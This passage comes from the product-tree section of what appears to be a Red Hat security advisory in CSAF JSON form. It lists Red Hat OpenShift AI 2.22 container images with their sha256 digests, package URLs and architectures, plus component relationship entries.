"name": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"product_id": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-modelmesh-rhel9@sha256%3Aa3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594760"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"product_id": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-notebook-controller-rhel9@sha256%3Ae940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609614"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"product_id": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-operator-bundle@sha256%3Abd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669970"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"product_id": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-rhel9-operator@sha256%3Aa54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669148"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"product_id": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-training-operator-rhel9@sha256%3A251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764595822"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"product_id": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-trustyai-service-operator-rhel9@sha256%3A3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1763639678"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64",
"product_id": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-trustyai-service-rhel9@sha256%3A51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764596318"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"product": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"product_id": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odh-dashboard-rhel9@sha256%3Abbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259?arch=ppc64le\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764637896"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"product_id": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-controller-rhel9@sha256%3Af43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773?arch=ppc64le\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764665999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"product": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"product_id": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odh-rhel9-operator@sha256%3A67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda?arch=ppc64le\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669148"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"product": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"product_id": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odh-dashboard-rhel9@sha256%3A3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b?arch=s390x\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764637896"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"product_id": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-controller-rhel9@sha256%3A0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab?arch=s390x\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764665999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"product": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"product_id": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odh-rhel9-operator@sha256%3A8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d?arch=s390x\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669148"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"product": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"product_id": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odh-dashboard-rhel9@sha256%3Afe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926?arch=arm64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764637896"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"product_id": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-controller-rhel9@sha256%3A0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667?arch=arm64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764665999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"product": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"product_id": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odh-rhel9-operator@sha256%3Ab8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e?arch=arm64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669148"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x"
},
"product_reference": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le"
},
"product_reference": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64"
},
"product_reference": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x"
},
